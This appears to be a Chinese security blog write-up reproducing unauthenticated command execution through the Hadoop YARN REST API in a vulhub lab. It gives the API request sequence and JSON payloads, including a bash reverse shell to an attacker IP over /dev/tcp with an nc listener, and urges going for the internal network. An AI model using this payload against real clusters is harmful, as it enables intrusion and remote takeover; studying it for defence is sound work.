Hadoop Yarn REST API 未授权问题导致 的命令执行

释放双眼,带上耳机,听听看~!

Hadoop Yarn REST API 未授权问题导致 的命令执行

注:这里说问题不说漏洞是由于认为的配置不当产生,而不是应用程序缺陷导致。

一、问题成因

Hadoop,其是一个由Apache基金会所开发的分布式系统基础架构,YARN是hadoop系统上的资源统一管理平台,其主要作用是实现集群资源的统一管理和调度,可以把MapReduce计算框架作为一个应用程序运行在YARN系统之上,通过YARN来管理资源。简单的说,用户可以向YARN提交特定应用程序进行执行,其中就允许执行相关包含系统命令。

 

 

先说说Hadoop Yarn REST API 未授权问题:YARN提供有默认开放在8088或者8090的REST API允许用户直接通过API进行相关的应用创建、任务提交执行等操作,如果配置不当,REST API将会开放在公网导致未授权访问的问题

二、环境搭建:

Centos docker+vulhub环境   编译方式:docker-compose

centos部署docker这里不用详细说了吧,故而省略。

切换到vulhub的hadoop/unauthorized-yarn目录下,docker启动后用docker-compose -up运行靶场,主机访问,前戏太多,我们进入正题。

 

额,我的没在虚拟机弄过这个,第一次搭建会自己拉取镜像。

完事访问

 

三、攻击步骤:

post请求ws/v1/cluster/apps/new-application,从而获取一个新的application id

,只要可以post请求上述api 获取到一串包含application_id的数据即可,

 

 

 

 

我们这里用burp吧,把请求包从get改成post就可以返回新的id

我们获取到这个新id的时候,就可以利用这个application id的身份请求服务器,

构造一组json数据如下:

{  

    “am-container-spec”:{  

        “commands”:{  

            “command”:”echo ” > /var/tmp/indes.php”

        }  

    },  

    “application-id”:”application_1585810022908_0004″,  

    “application-name”:”test”,  

    “application-type”:”YARN”  

}  Command值就是我们传给服务器的参数,也就是远程命令执行的payload

这是个样板,因为命令执行,所以我们不能没出息的只想拿到webshell,而且项目中大家想必都有一颗打穿内网的心,所以不局限于只创建个文件,要打就一步到位,我们直接对服务器下手,

{  

    “am-container-spec”:{  

        “commands”:{  

            “command”:”/bin/bash -i >& /dev/tcp/这里攻击机ip/端口 0>&1″

例如:”command”:”/bin/bash -i >& /dev/tcp/192.168.1.1/666 0>&1

 

        }  

    },  

    “application-id”:”application_1585810022908_0004″,  

    “application-name”:”test”,  

    “application-type”:”YARN”  

}  

 

提交地址为:http://www/ws/v1/cluster/apps

再给post过去,nc监听下端口,等shell,懒得粘数据我这里就用脚本直接提交了。

 

自慰型shell到手,复现结束。

Exp已经给出了,这里用的主要是requests库的post方法,定义好url和攻击机器地址,拼接漏洞点和url:port

再以POST方法请求,请求后会获取到一段包含application_id的数据,(这个浏览器显示为xml,但是数据请求可以为json,比如curl请求的时候返回为json)以json格式提取出application_id ,再将构造好的data,(其中app_id为获取的id)以post的方法提交到拼接的完整url中,最后再将构造好的json数据post到服务端响应,完成命令执行。

就说到这。

 

WEB安全安全独秀圈质量好文

一次对隔壁学校的渗透

2020-5-1 17:17:22

APT情报WEB安全安全独秀圈漏洞网络安全质量好文

CVE-2017-8291及利用样本分析

2020-5-1 23:45:31

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
有新私信 私信列表
搜索